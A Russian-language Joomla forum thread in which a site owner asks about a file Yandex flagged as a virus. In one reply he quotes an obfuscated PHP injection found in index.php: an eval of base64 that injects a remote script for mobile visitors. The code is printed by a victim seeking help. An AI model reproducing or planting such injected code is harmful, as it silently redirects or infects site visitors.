Новости Joomla

Вышли релизы безопасности Joomla 6.1.1 и Joomla 5.4.6

Релиз безопасности Joomla 6.1.1 и Joomla 5.4.6

Проект Joomla! рад сообщить о выходе Joomla 6.1.1 и Joomla 5.4.6. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

0 Пользователей и 1 Гость просматривают эту тему.
  • 5 Ответов
  • 1904 Просмотров
*

rembot

  • Захожу иногда
  • 101
  • 2 / 0
  • +++
Файл about.php
« : 04.12.2012, 11:44:20 »
Яндекс - обнаружил на сайте вирус. Указал на файл administrator/about.php
На сколько я понимаю, файл этот лишний. Но в случае удаления его, вылетает белый экран. Причем при включении рапорта о ошибках, все равно вылетает только белый экран без ошибок, если загружаю about.php обратно, сайт продолжает работать.

файл about.php, содержит следующий зашифрованный текст:
Спойлер
[свернуть]
*

rembot

  • Захожу иногда
  • 101
  • 2 / 0
  • +++
Re: Файл about.php
« Ответ #1 : 04.12.2012, 12:22:08 »
В индексе CMS, был код:
<?php
@require_once 'administrator/about.php'; #xn--90aqlcbabncjl.xn--p1ai
?>
<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kLndhcC53bWx8YXBwbGljYXRpb25cL3ZuZC53YXAueGh0bWxcK3htbC9zaScsIEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFQnXSkgfHwgcHJlZ19tYXRjaCgnL2FsY2F0ZWx8YW1vaXxhbmRyb2lkfGF2YW50Z298YmxhY2tiZXJyeXxiZW5xfGNlbGx8Y3JpY2tldHxkb2NvbW98ZWxhaW5lfGh0Y3xpZW1vYmlsZXxpcGhvbmV8aXBhZHxpcGFxfGlwb2R8ajJtZXxqYXZhfG9wZXJhLm1pbml8bWlkcHxtbXB8bW9iaXxtb3Rvcm9sYXxuZWMtfG5va2lhfHBhbG18cGFuYXNvbmljfHBoaWxpcHN8cGhvbmV8c2FnZW18c2hhcnB8c2llLXxzbWFydHBob25lfHNvbnl8c3ltYmlhbnx0LW1vYmlsZXx0ZWx1c3x1cFwuYnJvd3Nlcnx1cFwubGlua3x2b2RhZm9uZXx3YXB8d2Vib3N8d2lyZWxlc3N8eGRhfHhvb218enRlL3NpJywgQCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgfHwgcHJlZ19tYXRjaCgnL21zZWFyY2h8bVw/cT0vc2knLCBAJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkgJiYgIXByZWdfbWF0Y2goJy9tYWNpbnRvc2h8YW1lcmljYXxhdmFudHxkb3dubG9hZHx3aW5kb3dzXC1tZWRpYVwtcGxheWVyfHlhbmRleHxnb29nbGUvc2knLCBAJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSkgew0KICAgIA0KICAgIGVjaG8gJzxzY3JpcHQ+dmFyIF8weGUxZTg9WyJceDNDXHg3M1x4NjNceDcyXHg2OSIsIlx4NzBceDc0XHgyMFx4NzRceDc5XHg3MFx4NjVceDNEXHgyMlx4NzRceDY1XHg3OFx4NzRceDJGXHg2QVx4NjFceDc2XHg2MVx4NzNceDYzXHg3Mlx4NjlceDcwXHg3NFx4MjJceDIwXHg3M1x4NzJceDYzXHgzRFx4MjJceDY4XHg3NFx4NzRceDcwXHgzQVx4MkZceDJGXHg3Mlx4NzVceDJEXHg3MFx4NjhceDZGXHg2RVx4NjVceDJFXHg2M1x4NkZceDZEXHgyRlx4M0ZceDc0XHg3OVx4NzBceDY1XHgzRFx4NkFceDczXHgyNlx4NzNceDY1XHg3Mlx4NjVceDY2XHgzRCIsIlx4NzJceDY1XHg2Nlx4NjVceDcyXHg3Mlx4NjVceDcyIiwiXHgyMlx4M0VceDNDXHgyRlx4NzNceDYzXHg3Mlx4NjkiLCJceDcwXHg3NFx4M0UiLCJceDc3XHg3Mlx4NjlceDc0XHg2NSJdO2RvY3VtZW50W18weGUxZThbNV1dKF8weGUxZThbMF0rXzB4ZTFlOFsxXStlbmNvZGVVUklDb21wb25lbnQoZG9jdW1lbnRbXzB4ZTFlOFsyXV0pK18weGUxZThbM10rXzB4ZTFlOFs0XSk7PC9zY3JpcHQ+JzsNCiAgICBmbHVzaCgpOw0KfQ=='\x29\x29\x3B", "."); ?>
<?php
ob_start();
?>

После его удаления, смог удалить и about.php
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Файл about.php
« Ответ #2 : 04.12.2012, 12:39:05 »
А что в index.php сайта, администратора, шаблона и .htaccess ?
Ведь в этих файлах может быть условие проверки на наличие файла about.php
п.с.
Не дочитал второе сообщение.Но уже удалять не буду.
*

assaru

  • Давно я тут
  • 763
  • 88 / 1
Re: Файл about.php
« Ответ #3 : 04.12.2012, 13:14:01 »
А Вас не напрягает то, что левый файл оказался в папке administrator?
Проблему можно решить и по скрину и по эмоциям, счет на оплату через ЛС (с) Nobody
*

rembot

  • Захожу иногда
  • 101
  • 2 / 0
  • +++
Re: Файл about.php
« Ответ #4 : 04.12.2012, 13:16:18 »
А Вас не напрягает то, что левый файл оказался в папке administrator?
О чем это говорит?
*

assaru

  • Давно я тут
  • 763
  • 88 / 1
Re: Файл about.php
« Ответ #5 : 04.12.2012, 13:18:56 »
О том, что кому-то захотелось чтобы он там лежал наверное....
Проблему можно решить и по скрину и по эмоциям, счет на оплату через ЛС (с) Nobody
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

RSFireWall - как сделать файл Hashes для новой версии Joomla

Автор Lopes-popes

Ответов: 11
Просмотров: 3320
Последний ответ 18.12.2019, 15:41:26
от Театрал
Файл конфигурации попытка взлома

Автор Evgenii_web

Ответов: 8
Просмотров: 1933
Последний ответ 09.03.2019, 11:06:54
от wishlight
В корне сайта появляется файл с именем ".bt" (без ковычек)

Автор maestra

Ответов: 34
Просмотров: 9218
Последний ответ 14.08.2018, 10:58:57
от winstrool
Проверка на вирусы: как не удалить нужный файл

Автор Vosblog

Ответов: 4
Просмотров: 2563
Последний ответ 05.09.2017, 23:12:57
от ELLE
Странный файл появляется- php-mail.log

Автор Elimelech

Ответов: 22
Просмотров: 2618
Последний ответ 28.04.2017, 15:48:10
от Elimelech